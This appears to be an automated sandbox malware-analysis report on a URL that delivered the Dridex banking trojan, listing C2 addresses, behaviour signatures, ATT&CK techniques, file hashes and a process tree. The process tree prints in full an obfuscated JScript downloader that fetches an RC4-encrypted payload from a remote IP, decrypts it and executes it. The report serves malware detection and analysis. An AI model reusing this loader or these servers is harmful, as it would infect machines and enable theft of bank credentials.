Overview

overview

10

Static

static

URLScan

urlscan

http://magickpeoplen...

windows10_x64

10

Resubmissions

02-06-2021 08:33

210602-ft6tcnm7l6 10

31-05-2021 23:55

210531-sga8xmymq2 1

Analysis

  • max time kernel
    134s
  • max time network
    141s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    02-06-2021 08:33

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    http://magickpeoplenew.xyz/

  • Sample

    210602-ft6tcnm7l6

Score
10/10
dridex10111botnetcryptonediscoveryevasionpackertrojan

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

162.214.106.107:13783

46.231.204.10:8172
rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

    botnetdridex
  • CryptOne packer 2 IoCs

    Detects CryptOne packer defined in NCC blogpost.

    cryptonepacker
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 40 IoCs
    adwarespyware
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://magickpeoplenew.xyz/
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2208
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2208 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1796
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hj4ZytE5dZgd" "http://31.44.3.115/?MTQ5MDI5&MsTvB&s2ht4=2fn7DVHpqmeCij07eeEALwsF6WTh7S6vB-Lu1Tfwe0jiqEOQE4n9leTF5T8_GqzkLlzRaYg5SA_kCOYgkX_MeRE7Uz3A_xm7JAc5okwBKH7WlTxe4fVlsT4AlAn6nPQqKfrkBzAkY1UgTKLJoioh7BBiPYNT5whvSLRGZ22-rN8sc&oa1n4=x33QcvWfaRuPCYjEM__dSqRGPkvVHliPxo&zvUMeXRuqMzE5MA==" "2""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1388
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "hj4ZytE5dZgd" "http://31.44.3.115/?MTQ5MDI5&MsTvB&s2ht4=2fn7DVHpqmeCij07eeEALwsF6WTh7S6vB-Lu1Tfwe0jiqEOQE4n9leTF5T8_GqzkLlzRaYg5SA_kCOYgkX_MeRE7Uz3A_xm7JAc5okwBKH7WlTxe4fVlsT4AlAn6nPQqKfrkBzAkY1UgTKLJoioh7BBiPYNT5whvSLRGZ22-rN8sc&oa1n4=x33QcvWfaRuPCYjEM__dSqRGPkvVHliPxo&zvUMeXRuqMzE5MA==" "2""
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:3588
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c zmseu.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4124
            • C:\Users\Admin\AppData\Local\Temp\zmseu.exe
              zmseu.exe
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:4168

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    71d7a044701948ca4e59aa37f5d94260

    SHA1

    4952051481ef52d8fa5eb95b7832729dfc5e0bb4

    SHA256

    bb7642da343e083585a1b00d995039544037747c542eb7937726692f9c388dfa

    SHA512

    16bb691baa401ac3c5b7424a0bf2248cc1226839960cbe6bf484fc898f4c06a85226181386ecb83064c5bb36de9b099f24294ea044bed3176b67fb0298f5159f

    Download Submit
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    eb4e278cf28565d97c25d1b4943d6171

    SHA1

    54054fd6e9e9340d8484b775e03a44ea7a300d74

    SHA256

    11ffd302a3cb7d9a6e759770b46f85b190babb2445ab5482ad97781cac12b400

    SHA512

    37ae2d925c7a0a49e3041c263199e9ec58a240070dd313bcbb69d60469d3628f18437f64e0dcc660b159b3b9bd11703c2f78101189b75fdfea491ecba5ee093d

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\317KXRBC.cookie
    MD5

    5ebcfad97f1996029771479b350f18cc

    SHA1

    28a121674ae2f4d592432b4051ff66eb294f970c

    SHA256

    8ca05547931b118d68d4ef049182efe841856cc042519bdfb2265254382ea04a

    SHA512

    da899d8e36e0897d4f69b4c76e0cb3fccc6585bbd25c68cab5c6f58d355da717a3194b151b3095aa9e0846d66875de8dfa76eb163040cfd506d4da8e6e01a7ea

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\42CKLL15.cookie
    MD5

    94a941e5277e6ef89c5ff5169d8c004a

    SHA1

    a3fc34a2de2e4012431cd19ddcecb56791ae1c72

    SHA256

    05d2a1a1dd487dba84c828b39eccb31953257475c5975457d077181a187e1347

    SHA512

    91642d285c74e742df124206e4331663560860beb60b86d58150eb9222be66058ba7673088464154c1b9368353cf42363c8578cc94bb304158a80a74454ad41c

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    60fc00422b399db85f87d41b8328976d

    SHA1

    bb85034acad8025f97e5bb236443debaf8926e4b

    SHA256

    c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

    SHA512

    16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\zmseu.exe
    MD5

    88cdcb149db6ecf35adbdeecb8dcdf35

    SHA1

    45445ad72c0ca8c9e1fb5a9c068d0c185f481030

    SHA256

    6a534ae6677f311c1ccc3e0f590ab0b18d50cadce8f662ed3befb67f2efe7ad9

    SHA512

    4dbdec7b254e4a17c3518a1cba0356223ac3116871e626e522320eb87d2233119e3ea5f9f50a9ea462f53f7ab2e229a13e651e98b74a1030ae50e1e262568896

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\zmseu.exe
    MD5

    88cdcb149db6ecf35adbdeecb8dcdf35

    SHA1

    45445ad72c0ca8c9e1fb5a9c068d0c185f481030

    SHA256

    6a534ae6677f311c1ccc3e0f590ab0b18d50cadce8f662ed3befb67f2efe7ad9

    SHA512

    4dbdec7b254e4a17c3518a1cba0356223ac3116871e626e522320eb87d2233119e3ea5f9f50a9ea462f53f7ab2e229a13e651e98b74a1030ae50e1e262568896

    Download Submit
  • memory/1388-116-0x0000000000000000-mapping.dmp
    Download
  • memory/1796-115-0x0000000000000000-mapping.dmp
    Download
  • memory/2208-114-0x00007FF834CA0000-0x00007FF834D0B000-memory.dmp
    Filesize

    428KB

    Download
  • memory/3588-117-0x0000000000000000-mapping.dmp
    Download
  • memory/4124-119-0x0000000000000000-mapping.dmp
    Download
  • memory/4168-120-0x0000000000000000-mapping.dmp
    Download
  • memory/4168-124-0x0000000000400000-0x0000000000550000-memory.dmp
    Filesize

    1.3MB

    Download
  • memory/4168-123-0x0000000000550000-0x000000000069A000-memory.dmp
    Filesize

    1.3MB

    Download